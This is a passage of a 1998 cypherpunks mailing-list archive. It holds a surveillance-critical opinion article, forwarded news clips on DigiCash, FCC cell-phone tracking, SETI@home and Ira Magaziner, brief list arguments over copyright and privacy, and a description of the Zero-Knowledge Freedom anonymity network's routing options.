 companies formed the Global Information Infrastructure Commission
 (GIIC). Headed by the president of Mitsubishi, the chair of EDS,
 and the vice chair of Siemens Corporation, the GIIC intends to
 create a conglomerate of interests powerful enough to subsume
 government interest in the regulation of biometric and other
 technologies. The effort is being funded to a large extent by the
 World Bank.=20

 Governments in 26 countries are, at this moment, monitoring and
 cooperating with project FAST (Future Automated Screening for
 Travelers). FAST was first piloted in 1993 by US immigration
 authorities when a new lane at New York's John F. Kennedy airport
 was opened. The technology for the system is known as INPASS
 (Immigration and Natur-alization Service Passenger Accelerated
 Service System) which is a biometric identification system used to
 expedite passengers through customs at international airports in as
 little as 20 seconds.=20

 Applicants for registration with FAST are interviewed, and identity
 confirmed. Hand prints are taken, converted to a template and
 stored digitally on a smart card. Once the last of five green
 lights appear at the tips of the fingers, the glass exit door opens
 and the passenger continues to the baggage claim and customs zone.
 The system is currently a voluntary trial for frequent travellers
 to and from the USA who are US or Canadian nationals. =20

 With new technology, travelers can rest assured that their security
 is always in good hands. The US Militech Corporation has developed
 a Passive Millimeter Wave Imaging system, which can scan people
 from up to 12 feet away and see through clothing to detect
 concealed items such as weapons, packages and other contraband.
 Variations of this through-clothing human screening are under
 development by companies such as the US Raytheon Corporation, and
 will be an irresistible addition to international airports
 everywhere.=20

 Once upon a time, surveillance was targeted at certain groups and
 individuals. In our time, surveillance occurs en masse. Much of the
 `harmless' computer based technology necessary for our daily lives
 could actually be used to keep the entire population under
 surveillance. =20

 Telephone systems lend themselves to a dual role as a national
 interceptions network, according to "An Appraisal of the
 Technologies of Political Control". For example, the message
 switching system used on digital exchanges like System X in the UK,
 supports an Integrated Services Digital Network (ISDN) Protocol.
 This allows digital devices, e.g. faxes, to share the system with
 existing lines. The ISDN subset is defined in their documents as
 "Signaling CCITT"-series interface for ISDN access. =20

 What is not widely known is that built-in to the international
 CCITT protocol is the ability to take phones `off hook' and listen
 into conversations occurring near the phone, without the user being
 aware that it is happening. This effectively means that a national
 dial up telephone tapping capacity is built into these systems from
 the start. Further, the digital technology required to pinpoint
 mobile phone users for incoming calls means that all mobile phones
 in a country when activated, are mini-tracking devices.=20

 The issues surrounding the uncontrolled and unregulated spread of
 tyrannical technology are immediate and ongoing. The technologies
 of repression that are trialed in so-called non-democratic
 countries are now being aggressively marketed in the West, while
 Hitler's Germany becomes a vague memory. It is up to us to do what
 ever we can to stop the insidious spread of this technology, and to
 demand the right to choose whether we participate in the biometric
 system or not. We should ask ourselves... who will heed our cry for
 help once these technologies are fully implemented? =20


 REFERENCES=20

 Davies, Simon, "Touching Big Brother", Information Technology
 People, Vol 7, No 4, 1994=20

 Elllerman, Sarah, "The Rise of Tempest", Internet Underground
 Magazine, June 1996.=20

 European Parliament, Scientific and Technical Operations
 Assessment, 1998, "An Appraisal of Technologies of Political
 Control", available at http://jya.com/stoa-atpc.com=20

 Jane's US Military R & D, "Human Computer Interface, Vol 1, Issue 3
 1997=20

 O'Sullivan, Olara, "Biometrics comes to Life",
 http://www.banking.com/aba/cover_0197.htm=20

 Privacy International, 1995, "Big Brother Incorporated",
 http://www.privacy.org/pi=20

 US Scientific Advisory Board, "New World Vistas", the proceedings
 of Fiftieth Anniversary Symposium of the USAF SAB, November 10,
 1994, (republished by International Committee for the Convention
 Against Offensive Microwave Weapons).=20



 Susan Bryce is an investigative journalist and researcher whose
 interests include issues which affect individual freedom,
 environmental health, surveillance technology and global politics.
 She can be contacted c/- Mapleton Post Office, QLD 4560


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 8 Nov 1998 05:53:08 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 6.14: Anonymous eCash Provider-DigiCash-Files Chapter 11
Message-ID: <199811072128.NAA19746@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ama-gi ISPI" <offshore@email.msn.com>
Subject: IP: ISPI Clips 6.14: Anonymous eCash Provider-DigiCash-Files Chapter 11
Date: Fri, 6 Nov 1998 00:19:06 -0800
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 6.14: Anonymous eCash Provider-DigiCash-Files Chapter 11
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Friday November 6, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: CNET News.com, November 4, 1998
http://www.news.com

DigiCash Files Chapter 11
http://www.news.com/News/Item/0,4,28360,00.html?st.ne.4.head

By
Tim Clark, timc@cnet.com
Staff Writer, CNET News.com

Electronic-cash pioneer DigiCash [ http://www.digicash.com/ ] said today
it's filing for Chapter 11 bankruptcy protection after shrinking its
payroll to about six people from nearly 50 in February.

The company, which has been running off a bridge loan from its venture
capital investors since June, is seeking new investors from established
financial institutions or a buyer for its software technology. The
company's operations in the Netherlands, where it was founded, were
liquidated in September.

"To really launch and brand something like this in the Internet space is
likely to take a fair amount more capital," said Scott Loftesness,
DigiCash's interim CEO since August. "It's more appropriate for strategic
investors, corporate players or banks themselves as a consortium model."

Electronic-cash schemes have found difficult sledding recently. First
Virtual Holdings
[ http://www.firstvirtual.com/ ], which had a form of e-cash, exited the
business in July. CyberCash's [ http://www.cybercash.com/ ] CyberCoin
offering hasn't really caught on. Digital Equipment, now part of Compaq
Computer [ http://www.compaq.com/ ] is testing its Millicent electronic
cash, and IBM [ http://www.ibm.com/ ] is in early trials for a product
called Minipay.

Under bankruptcy laws, DigiCash's Chapter 11 filing allows the company to
continue operations, while keeping its creditors at bay as the company
reorganizes. Most of DigiCash's $4 million in debt is owed to its initial
venture capital financiers who extended the bridge loan, August Capital
http://www.augustcap.com/ ], Applied Technology, and Dutch investment firm
Gilde Investment.

DigiCash's eCash allows consumers to make anonymous payments of any
amount--and anonymity differentiates eCash against other e-cash schemes.
DigiCash's intellectual property assets include patents, protocols, and
software systems that also could be used for applications, like online
electronic voting or private scrip issued by a particular retailer.

DigiCash suffered a setback in September when the only U.S. bank offering
its scheme, Mark Twain Bank, dropped the offering. But a number of major
banks in Europe and Australia offer or are testing DigiCash's electronic
cash.

Also in September, DigiCash closed its Dutch operations and liquidated its
assets there.

Loftesness said DigiCash has a list of 35-40 potential partners, and he has
been talking to players like IBM for months. He expects to resolve
DigiCash's status in the next five months.

"Everybody feels anonymous e-cash is inevitable, but the existing situation
was not going to get there from here," said Loftesness, who is frustrated
by potential partners telling him, "This is absolutely strategic, but
unfortunately it's not urgent."

The company was founded by David Chaum and was well-known in the Internet's
earliest days. MIT Media Labs' Nicholas Negroponte is a director of
DigiCash.

Copyright (c) 1995-98 CNET, Inc.

--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you are concerned about the erosion
of your privacy in general, won't you please help us continue this
important work by becoming an "ISPI Supporter" or by taking out
an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.









****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 8 Nov 1998 07:09:21 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 6.17: FCC Accepting Comments on Mandatory Cell Phone Tracking
Message-ID: <199811072128.NAA19757@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ama-gi ISPI" <offshore@email.msn.com>
Subject: IP: ISPI Clips 6.17: FCC Accepting Comments on Mandatory Cell Phone Tracking
Date: Fri, 6 Nov 1998 00:26:49 -0800
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 6.17: FCC Accepting Comments on Mandatory Cell Phone Tracking
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Friday November 6, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Part One:

This From: Coalition for Constitutional Liberties, Weekly Update for
11/06/98
                    Volume I, Number 37
http://www.freecongress.org/cfcl/latest.htm

Comment Period for CALEA Wiretapping Regulations Announced

The Federal Communications Commission announced this week that it would
be accepting comments in response to its Notice of Proposed Rule Making
until December 14th. The Commission proposed requiring cellular and
other wireless phone companies to track the location of their customers,
identifying the cell site at the beginning and end of every call. Weekly
Update readers and organizations are encouraged to submit their written
comments to the FCC:

Federal Communications Commission
1919 M St.
Washington, DC 20554
Re: Docket # 97-213


The Center for Democracy and Technology has set up a website for those
interested in filing comments: http://www.cdt.org/action/filing.html
~~~~~~~~~~~~~~~~~~~~~~~~~~
Part Two:

This From: The Center for Democracy and Technology, October 28, 1998
http://www.cdt.org

FCC PROPOSES LOCATION TRACKING FOR WIRELESS PHONES
http://www.cdt.org/action/filing.html

As the FBI has realized, new communications technology can be designed in
ways that vastly increase the potential for government surveillance.
Cellular and other wireless phones can generate information that can be
used to locate individuals even if they aren't suspected of a crime.

The FCC, with urging from the FBI, is considering a proposal to use your
cellphone as a personal tracking device. This unprecedented attack on your
privacy must be opposed.

Cellular phones have become integral to many peoples' lives. Over fifty
million ordinary Americans carry cellular phones with them as they go about
their daily activities. Cellular phones are far more closely linked to an
individual than are wireline phones. In essense, a cellular phone can
become a tracking device, revealing to the government far more about your
whereabouts, your associations, and your activities than the government can
learn about you from the fact that your home phone was used to make a call
a particular time of day.

In 1994, when this topic was being debated in Congress, FBI Director Freeh
testified that location information was not mandated by law. FBI Director
Freeh testified that the law, "does not include any information which might
disclose the general location of a mobile facility or service."

Congress wanted to protect privacy, and took the FBI at its word that it
would not seek to use cellphones as citizen tracking devices.

Now the FCC, with urging from the FBI, is proposing to rewrite the law,
requiring location information as part of a nationwide surveillance
capability. This will allow the FBI to use your cellphone as a personal
tracking device.

--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you are concerned about the erosion
of your privacy in general, won't you please help us continue this
important work by becoming an "ISPI Supporter" or by taking out
an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.








****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 8 Nov 1998 07:05:43 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Discover Alien Life With Your PC And SETI
Message-ID: <199811072128.NAA19768@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Richard Sampson <rjsa@sprintmail.com>
Subject: IP: Discover Alien Life With Your PC And SETI
Date: Fri, 06 Nov 1998 08:09:03 -0500
To: "ignition-point@majordomo.pobox.com" <ignition-point@majordomo.pobox.com>

****Discover Alien Life With Your PC And SETI
 TOKYO, JAPAN, 1998 NOV 5 (Newsbytes) -- By Martyn Williams, Newsbytes.
The SETI@home project, which hopes to harness the idle processing power
of thousands of desktop personal computers to help in the search for
intelligent life in the universe, is back on track with an April 1999
launch date.

The project was launched in mid 1997 and was scheduled to begin
operations early this year (Newsbytes, August 18, 1997) but the launch
was delayed after funding problems slowed research and development
work. Now, with new funding and hardware donated by Sun Microsystems,
the project is back on track.

Hoping to attract the millions of computer users that believe in the
existence of intelligent life in space, the project will be based
around a special screensaver. Like any screensaver, the software kicks
in when you aren't using your PC but unlike other software, the
SETI@home application won't present you with a banal selection of
flying windows of swimming fish.

Instead, it will be doing something much more useful: analyzing radio
frequency spectrum data captured by the Arecibo radio telescope in
Puerto Rico. The analysis is searching for a signal out of all the
noise from space - a signal that may reveal the existence of
intelligent life.

The project team estimates that once 50,000 PCs are enrolled in the
project, the SETI@home program will rival other similar SETI (search
for extraterrestrial intelligence) programs that are looking for
signals from space and may turn up signals that would otherwise be
missed.

The program works like this: data is collected from SERENDIP, a SETI
project based at UC Berkeley, on magnetic tape and transferred to
SETI@home servers. This data is then distributed to participating PC
users as they log onto the Internet and the data is analyzed on their
PCs. Once finished, the results are returned to the project servers via
the Internet.

First tests of the system, with 100 volunteers, has just begun and
the project hopes to make available the first generation SETI@home
screensavers in April 1999. These will be available for Windows, Apple
and Unix based platforms.

What's in it for the user? Apart from helping science, the team says,
"There's a small but captivating possibility that your computer will
detect the faint murmur of a civilization beyond Earth."

For more information on the project, how to offer your spare computer
capacity and how to donate money, check the SETI@home Web page at
http://setiathome.ssl.berkeley.edu . Numerous foreign language versions
of the page are also available.

Reported By Newsbytes News Network, http://www.newsbytes.com

-0-

(19981105/WIRES ONLINE/)


News provided by COMTEX.
[!BUSINESS] [!HIGHTECH] [!INFOTECH] [!PUBLIC+COMPANIES] [!WALL+STREET]
[COMPUTER] [HARDWARE] [INTERNET] [JAPAN] [MONEY] [NBY] [NEWS] [NEWSGRID]
[PUERTO+RICO] [RADIO] [RESEARCH] [SCIENCE] [SOFTWARE] [TOKYO]


--
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a
prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------



****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sun, 8 Nov 1998 04:05:35 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Identification and Privacy are not Antinomies (fwd)
Message-ID: <199811071943.NAA02441@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 7 Nov 1998 20:26:24 +0100
> From: Anonymous <nobody@replay.com>
> Subject: Identification and Privacy are not Antinomies

> Am I a UK citizen, a good credit risk, a club member in good
> standing, etc.  An appropriate mechanism, a smartcard, can easily 
> authenticate both itself (challenge-response) and the bearer via a biometric 
> and/or PIN without revealing the identity of the holder.
> 
> However, who holds out hope that such a sensible
> thing would ever be adopted by the powers-that-be.

What the powers-that-be hold is realy irrelevant. The issue is what do we do
to make sure that the powers-that-are-to-be don't have that option?


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 8 Nov 1998 04:16:34 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Head of U.S. Internet Policy Plans to Resign: Magaziner
Message-ID: <v04020a54b26a529ab2cd@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Sat, 07 Nov 1998 09:05:02 -0600
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: Head of U.S. Internet Policy Plans to Resign: Magaziner
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Source:  New York Times
http://www.nytimes.com/library/tech/yr/mo/cyber/articles/07magaziner.html

November 6, 1998

Magaziner, Head of U.S. Internet Policy, Plans to Resign

By JERI CLAUSING

ASHINGTON -- Ira C. Magaziner, who has led the Clinton
Administration's efforts to foster the growth of the Internet and
electronic commerce, said today that he plans to leave the White House
before the end of the year.

Magaziner said he has not set a departure
date or made any firm plans for his future,
but he hopes to wrap up his duties within
the next month and move back to New
England. His family moved there a year ago,
he said, and he has been commuting since
then.

"I felt a responsibility to follow through on
what we had committed," Magaziner said.
"And we have had some good successes."

Magaziner joined the Clinton Administration
five and a half years ago to draft what
turned out to be a doomed effort to
restructure the nation's health care system.
He then turned to the Internet, where he has been aggressively trying to
shape domestic and international policy for electronic commerce and
governance of the Internet.

"At a time when there was a lot of confusion about where the [Internet]
industry was going both domestically and internationally, Ira Magaziner
was the guy who rolled up his sleeves and got into the nitty-gritty of how
technology works, what the effect would be on our society, and then
took those notions and began to be the evangelist for the Internet industry
in a global marketplace," said Brian O'Shaughnessy, spokesman for the
Internet Alliance, one of the world's largest associations of companies
with Internet interests.

"He's a cerebral guy who took these intellectual ideas and wrestled a lot
of very powerful forces to the table... He's certainly been the champion
for [Internet] self-governance."

In June 1997, after studying the Internet for 15 months, Magaziner
released the Administration's "Framework for Electronic Commerce,"
which called for a hands-off, market-driven approach to regulation of the
global network. Magaziner's philosophy then and now is that while the
Internet is growing rapidly, this growth could be stymied by excessive
government intervention.

"For this potential to be realized fully," he wrote in that report,
"governments must adopt a nonregulatory, market-oriented approach to
electronic commerce, one that facilitates the emergence of a transparent
and predictable legal environment to support global business and
commerce. Official decision makers must respect the unique nature of the
medium and recognize that widespread competition and increased
consumer choice should be the defining features of the new digital
marketplace."

Since then, he has led efforts to hand administration of the global network
over to the private sector, and has traveled the world pushing other
countries to endorse his tax-free, unregulated approach to the new
medium.

Magaziner said he is satisfied that he has put the issue of electronic
commerce on the world's agenda. In addition to winning passage of two
new laws imposing a moratorium on new Internet taxes in the United
States and protecting copyrights in the digital age, he has won
international agreements to keep the Internet duty-free and set standards
for international payment systems.

He is also wrapping up what has been a highly contentious effort to hand
the administrative functions of the Internet's name and address system
over to a private corporation.

But as he announces his departure, Magaziner has left one important
issue -- online privacy -- unresolved.

Magaziner has been the lead cheerleader for industry self-regulation on
how personal data is collected and used in electronic databases, a
controversial stance that has put the United States directly at odds with
the European Union and one that threatens to disrupt electronic
commerce with those countries.

Critics say he has ignored consumer interests in favor of business.
However, others laud his refusal to back down.

"Ira...has been working long and hard on behalf of self-governance and
not letting the E.U. data directive simply become the rule of the day,"
O'Shaughnessy said.

The European directive that took effect last month imposes strict privacy
policies on companies that do business in Europe. A key provision of that
law prohibits any company doing business in the European Union from
transmitting personal data to any country that does not guarantee
comparable privacy protections.

The European Union has said that self-regulatory models adopted by
industry groups in the United States do not meet its requirements. It has
held off on imposing sanctions against the United States until at least
December while the governments involved attempt to negotiate a
compromise.

The Commerce Department this week laid out its negotiating position,
which proposes giving companies a variety of "safe harbors" to satisfy
privacy protection. One idea is to create independent organizations that
would monitor a company's data practices and give companies that
comply with accepted guidelines what amounts to a stamp of approval.

The E.U. has so far rejected that plan. But Magaziner said the
Administration has scored a victory in getting the E.U. to agree to discuss
self-regulation as a remedy.

"They agreed to hold back, and we are still discussing it with them," he
said. "We got them to recognize in February self-regulation as being
legitimate. So under their own direction they are saying self-regulatory
approaches can work. Now we have to get them to agree to recognize
what we are proposing. That may not be finished by the time I leave, but
it will be well along."

Magaziner has also been leading the effort to move administration of the
Internet to an international, nonprofit corporation. That power had been
exercised by the United States government -- at first directly, and in
recent years under a government contract granting a monopoly on
domain name registrations to Network Solutions, a corporation based in
Herndon, Va.

A driving force toward creation of the new board was the demand by
private companies around the world that they be allowed to compete
with Network Solutions in the lucrative business of registering domain
names.

But finding a solution that balances the interests of more traditional,
academic institutions with trademark holders and commercial entities with
a huge stake in the future of electronic commerce proved difficult, and
much controversy still surrounds the plan that Magaziner hopes to finalize
this month.

Last month, the Administration tentatively
approved handing the reins of the Internet over
to the Internet Corporation for Assigned Names
and Numbers (ICANN).

This new corporation was set up largely under
the direction of one of the Internet's founders,
the late Jon Postel. Although the ICANN proposal was presented as
having "the support of a broad consensus of Internet stakeholders,
private and public," several groups have complained that it was
hammered out in secret and still lacks proper fiscal controls and
appropriate power checks on future board members.

The Department of Commerce has asked the nine-member interim board
of ICANN to craft new bylaws that address those concerns, a proposal
that is expected to be completed within the next week and which will be
the topic of a public meeting next week in Cambridge, Mass.

 Copyright 1998 The New York Times Company
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Sun, 8 Nov 1998 04:16:17 +0800
To: cypherpunks@cyberpass.net
Subject: Re: A question about the new ISP ruling and email...
Message-ID: <199811071956.OAA15936@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From: Jim Choate <ravage@EINSTEIN.ssz.com>
   >
   >   Hi,
   >
   >   I was pondering the draconian implications of the requirement to register
   >   ISP's. Would an email only site be an ISP under these regulations?

I dunno.

But I've begun netcopping the Ignition-Point list on
an ongoing basis (starting Friday), and they'll be
an interesting test case of whether what they're
doing is "fair use".

Pobox.com/listbox.com is reluctantly assigning a person
to receive (my) copyright complaints, and will register
themselves with the FCO.

I like to post whole articles myself.

Anyway, for a test case, better them than me.

---guy ;-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 8 Nov 1998 05:26:00 +0800
To: cypherpunks@cyberpass.net
Subject: Re: A question about the new ISP ruling and email...
Message-ID: <v04020a59b26a63c6bc67@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



Now *this* should be fun. Someone who claims to be a cypherpunk is now
going to call the copyright police on a non-profit, volunteer news list.

Cryptoanarchy indeed. The ganglia twitch.

When the going gets tough, the "tough" rat out the innocent, it appears...

Cheers,
Bob Hettinga

--- begin forwarded text


From: Information Security <guy@panix.com>
Date: Sat, 7 Nov 1998 14:56:55 -0500 (EST)
To: cypherpunks@cyberpass.net
Subject: Re: A question about the new ISP ruling and email...
Sender: owner-cypherpunks@cyberpass.net
Precedence: first-class
Reply-To: Information Security <guy@panix.com>
X-Loop: cypherpunks@cyberpass.net

   >   From: Jim Choate <ravage@EINSTEIN.ssz.com>
   >
   >   Hi,
   >
   >   I was pondering the draconian implications of the requirement to
register
   >   ISP's. Would an email only site be an ISP under these regulations?

I dunno.

But I've begun netcopping the Ignition-Point list on
an ongoing basis (starting Friday), and they'll be
an interesting test case of whether what they're
doing is "fair use".

Pobox.com/listbox.com is reluctantly assigning a person
to receive (my) copyright complaints, and will register
themselves with the FCO.

I like to post whole articles myself.

Anyway, for a test case, better them than me.

---guy ;-)

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Austin Hill" <austin@zks.net>
Date: Sun, 8 Nov 1998 05:55:16 +0800
To: <remailer-operators@anon.lcs.mit.edu>
Subject: re: Response to Anonymous re: Zero-Knowledge Freedom
In-Reply-To: <1c2f85724bce6d742c27daa1db101d10@anonymous>
Message-ID: <000e01be0a93$49b017a0$1901a8c0@austin.zks.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Attn: Anonymous

Thank you for your comments with regards to the Freedom project.   I
would like to respond to some of the points you have brought up.


>-----Original Message-----
>From: HyperReal-Anon [mailto:nobody@sind.hyperreal.art.pl]
>Sent: Friday, November 06, 1998 7:30 PM
>To: austin@zks.net
>Subject: 
>
>
>Attn: Austin Hill
>Zero Knowledge Systems, Inc.
>3981 St. Laurent Blvd. 
>Suite 810 
>Montr=E9al, Qu=E9bec 
>H2W 1Y5 
>Canada 
>514.286.2636 phone 
>514.286.2755 fax 
>
>Mr. Hill:
>
>Congratulations. I hope your name goes down in history for being
>involved in creating and operating FREEDOM.net
>
>Additional suggestions for the FREEDOM.NET concept:
>
>1) Undoubtedly, after your client software is developed and deployed
>there will be nations run by legislators and politicians with evil
>intentions to continue to restrict and sabotage the privacy of
>individuals. If your software already has flexible measures coded
into
>it to counter these evil forces, privacy seeking citizens from
>affected nations will prevail.
>
>For the client side software, it would be extremely useful to have a
>feature (or an input field) where users can view their IP hops
>(traceroutes), but more important to allow users to BYPASS all local
>FREEDOM servers in their home country (example: if terrible laws are
>passed like in the Netherlands requiring logging and storage of all
>packet info., etc.). In this manner, a local user in a restrictive
>nation could set their client to BYPASS all local FREEDOM servers,
>accessing only FREEDOM servers in the nearest friendly nation which
>protects privacy of users and allows FREEDOM servers to operate AS
YOU
>DESIGNED THEM.      Even the FSU of Russia has already begun to
>implement "black box" requirements at every ISP (only Internet by
>satellite will bypass this ?)
>
>Example:  
>
><Box to check> **Bypass local FREEDOM SERVER**
>Enter the IP address of first FREEDOM server to route 
>through__________________________________ (user fills in this blank)
>

Route definitions for use of AnonymousIP nodes is COMPLETELY
configurable.   A user of Freedom can define preferred exit hops (i.e.
'Make all my pseudonyms IP traffic come from country X'); server's to
avoid (i.e. 'Never use any Freedom node in country X'); and some
rather advanced custom configurations (i.e. 'Always make my exit hop
of of the following countries, use the fastest and best routing point
for my first hop and make my middle hop one of the following trusted
nodes')

With regards to countries such as the Netherlands; and Russia these
laws will have no effect on Freedom users.   Since all IP traffic
leaves the local computer anonymized and multiply encrypted with the
different keys for different hops a local ISP that is logging all
traffic as per government rules will only be able to log encrypted
data and be able to reveal that this user is using Freedom.    The
ability to define the destination or content of that Internet traffic
is not possible.    As well, due to the features we have included for
traffic analysis foiling, both packets and links are padded to avoid
traffic correlation's.    Even if an all powerful network attacker
with the ability to watch all incoming and outgoing connections to all
Freedom nodes attempts to correlate traffic patterns, they will not be
able to reveal the true identity behind the pseudonym.

The user interface for controlling the Freedom node selection and some
of these rules is designed to make it COMPLETELY transparent and easy
for the average Internet user.   There will be an advanced mode that
